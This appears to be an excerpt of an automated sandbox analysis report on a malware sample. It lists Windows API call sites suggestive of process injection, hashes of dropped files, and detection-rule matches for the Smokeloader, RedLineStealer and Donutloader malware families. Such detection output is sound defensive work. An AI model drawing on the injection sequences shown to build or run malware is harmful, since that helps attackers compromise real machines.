Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,	3_2_00402FD3
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_0040267C NtEnumerateKey,	3_2_0040267C
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_004020C4 LocalAlloc,NtQuerySystemInformation,	3_2_004020C4
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_004026DC NtClose,	3_2_004026DC
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_004020E3 LocalAlloc,NtQuerySystemInformation,	3_2_004020E3
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_004020E7 LocalAlloc,NtQuerySystemInformation,	3_2_004020E7
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_004020FC LocalAlloc,NtQuerySystemInformation,	3_2_004020FC
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_00402285 NtQuerySystemInformation,	3_2_00402285
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_004020B6 LocalAlloc,NtQuerySystemInformation,	3_2_004020B6
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_004020B8 LocalAlloc,NtQuerySystemInformation,	3_2_004020B8
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_00403149 RtlCreateUserThread,NtTerminateProcess,	3_2_00403149
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_00401553
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,	3_2_00403303
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_0040151E
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_004025DD NtOpenKey,	3_2_004025DD
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648A6900 RtlAllocateHeap,RtlAllocateHeap,NtQuerySystemInformation,	6_2_00007FF7648A6900
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648C59D0 NtProtectVirtualMemory,	6_2_00007FF7648C59D0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648C4FC0 NtReadVirtualMemory,	6_2_00007FF7648C4FC0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648C3F30 NtQueryInformationProcess,	6_2_00007FF7648C3F30
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648C5100 NtWriteVirtualMemory,	6_2_00007FF7648C5100
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648C5260 NtAllocateVirtualMemory,	6_2_00007FF7648C5260
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA77370 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	18_2_6CA77370
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA77490 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	18_2_6CA77490
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_02A02A98 NtProtectVirtualMemory,	18_2_02A02A98
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_02A02640 NtProtectVirtualMemory,	18_2_02A02640

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76487E810	6_2_00007FF76487E810
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648A43B0	6_2_00007FF7648A43B0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76487D7A0	6_2_00007FF76487D7A0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76488A9D0	6_2_00007FF76488A9D0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648DDFD0	6_2_00007FF7648DDFD0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648A57C0	6_2_00007FF7648A57C0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648B6DF0	6_2_00007FF7648B6DF0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648B11F0	6_2_00007FF7648B11F0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648E49F0	6_2_00007FF7648E49F0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76487CFF0	6_2_00007FF76487CFF0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764874BF0	6_2_00007FF764874BF0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648A6DE0	6_2_00007FF7648A6DE0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648929E0	6_2_00007FF7648929E0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76488FC10	6_2_00007FF76488FC10
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648C2010	6_2_00007FF7648C2010
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648B8C10	6_2_00007FF7648B8C10
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648D4E10	6_2_00007FF7648D4E10
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764884E00	6_2_00007FF764884E00
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76486C400	6_2_00007FF76486C400
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764877000	6_2_00007FF764877000
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76486BC00	6_2_00007FF76486BC00
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648E3F20	6_2_00007FF7648E3F20
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764871920	6_2_00007FF764871920
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648A3150	6_2_00007FF7648A3150
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648A9550	6_2_00007FF7648A9550
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764890740	6_2_00007FF764890740
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648D5D40	6_2_00007FF7648D5D40
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648C4370	6_2_00007FF7648C4370
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648BF370	6_2_00007FF7648BF370
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648E6B70	6_2_00007FF7648E6B70
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76486FB70	6_2_00007FF76486FB70
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648B7D60	6_2_00007FF7648B7D60
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76488D390	6_2_00007FF76488D390
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648C898B	6_2_00007FF7648C898B
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648C5B80	6_2_00007FF7648C5B80
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648AB6B0	6_2_00007FF7648AB6B0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648E8AB0	6_2_00007FF7648E8AB0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76487BAB0	6_2_00007FF76487BAB0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76488B6A0	6_2_00007FF76488B6A0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648664A0	6_2_00007FF7648664A0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648A04D0	6_2_00007FF7648A04D0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764865AD4	6_2_00007FF764865AD4
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764883AD0	6_2_00007FF764883AD0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764875ED0	6_2_00007FF764875ED0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648E16C0	6_2_00007FF7648E16C0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF76486A0F0	6_2_00007FF76486A0F0
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648A1510	6_2_00007FF7648A1510
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764875910	6_2_00007FF764875910
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648C1700	6_2_00007FF7648C1700
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764899830	6_2_00007FF764899830
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648BE430	6_2_00007FF7648BE430
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648DC230	6_2_00007FF7648DC230
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764873E30	6_2_00007FF764873E30
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648BB020	6_2_00007FF7648BB020
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764861450	6_2_00007FF764861450
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764870050	6_2_00007FF764870050
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648BCC40	6_2_00007FF7648BCC40
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648B5860	6_2_00007FF7648B5860
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF764891880	6_2_00007FF764891880
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648B3E80	6_2_00007FF7648B3E80
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Code function: 6_2_00007FF7648B2080	6_2_00007FF7648B2080
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9A3420	10_2_00007FFD9B9A3420
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9A4186	10_2_00007FFD9B9A4186
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9A51C6	10_2_00007FFD9B9A51C6
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9A4742	10_2_00007FFD9B9A4742
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9B08E8	10_2_00007FFD9B9B08E8
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9B0F0D	10_2_00007FFD9B9B0F0D
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 12_2_00007FFD9B9A3420	12_2_00007FFD9B9A3420
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 12_2_00007FFD9B9A3C24	12_2_00007FFD9B9A3C24
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 12_2_00007FFD9B9A4186	12_2_00007FFD9B9A4186
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 12_2_00007FFD9B9A51C6	12_2_00007FFD9B9A51C6
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 12_2_00007FFD9B9A4742	12_2_00007FFD9B9A4742
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 12_2_00007FFD9B9A48AC	12_2_00007FFD9B9A48AC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00757189	13_2_00757189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_007452E0	13_2_007452E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00762290	13_2_00762290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00761B52	13_2_00761B52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00751B25	13_2_00751B25
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0075EC40	13_2_0075EC40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00773CD0	13_2_00773CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0077CD40	13_2_0077CD40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00766F80	13_2_00766F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0077B840	13_2_0077B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0077D010	13_2_0077D010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00766F80	13_2_00766F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00766890	13_2_00766890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0075E086	13_2_0075E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00778880	13_2_00778880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00748960	13_2_00748960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0077B160	13_2_0077B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00744900	13_2_00744900
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0077A9E4	13_2_0077A9E4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_007629C9	13_2_007629C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_007641A0	13_2_007641A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0074C270	13_2_0074C270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00747270	13_2_00747270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00766210	13_2_00766210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_007572DD	13_2_007572DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_007582CB	13_2_007582CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00746B70	13_2_00746B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0077B350	13_2_0077B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0077D340	13_2_0077D340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0074FB10	13_2_0074FB10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00764BF0	13_2_00764BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_007633B6	13_2_007633B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0075EC06	13_2_0075EC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00760CB7	13_2_00760CB7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00745DE0	13_2_00745DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00743DD0	13_2_00743DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0077B5A0	13_2_0077B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00753678	13_2_00753678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00754E68	13_2_00754E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00755E97	13_2_00755E97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00773680	13_2_00773680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00741F10	13_2_00741F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00783710	13_2_00783710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_0077B700	13_2_0077B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 13_2_00763F97	13_2_00763F97
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9B9863FB	14_2_00007FFD9B9863FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9B986350	14_2_00007FFD9B986350
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9B980CF2	14_2_00007FFD9B980CF2
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA77CC0	18_2_6CA77CC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA74CD0	18_2_6CA74CD0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA95CD4	18_2_6CA95CD4
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA81C21	18_2_6CA81C21
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA84DE0	18_2_6CA84DE0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA88D6E	18_2_6CA88D6E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA78E20	18_2_6CA78E20
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA82890	18_2_6CA82890
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA84930	18_2_6CA84930
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA72B21	18_2_6CA72B21
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA7D5D0	18_2_6CA7D5D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA7C010	18_2_6CA7C010
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA792D0	18_2_6CA792D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA80210	18_2_6CA80210
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_00078C7E	18_2_00078C7E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_02A0EFC0	18_2_02A0EFC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_02A01EC8	18_2_02A01EC8
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_02A02640	18_2_02A02640
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_02A01EB8	18_2_02A01EB8
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_05FF90B1	18_2_05FF90B1
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_05FF077C	18_2_05FF077C
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_05FF23C8	18_2_05FF23C8

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\2FBE.exe AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\34CA.exe 505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 007493B0 appears 39 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0074FCA0 appears 202 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: String function: 6CA88D20 appears 35 times

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1128

Source: 34CA.exe.1.dr

Static PE information: Number of sections : 12 > 10

Source: 2FBE.exe.1.dr	Static PE information: No import functions for PE file found
Source: BD9E.exe.1.dr	Static PE information: No import functions for PE file found

Source: FpiUD4nYpj.exe, 00000000.00000002.1731701936.0000000002448000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilesigo@ vs FpiUD4nYpj.exe
Source: FpiUD4nYpj.exe	Binary or memory string: OriginalFilenamesOdilesigo@ vs FpiUD4nYpj.exe

Source: FpiUD4nYpj.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 18.2.vm.exe.29e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 18.2.vm.exe.29e0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 25.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 25.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000003.00000002.1964638535.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1731949971.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000003.00000002.1964481125.000000000258D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000002.4106101148.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000019.00000002.3260078878.0000000006010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000013.00000002.3185231236.0000000003860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1732147386.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000000.00000002.1731925508.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000013.00000002.3151962784.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
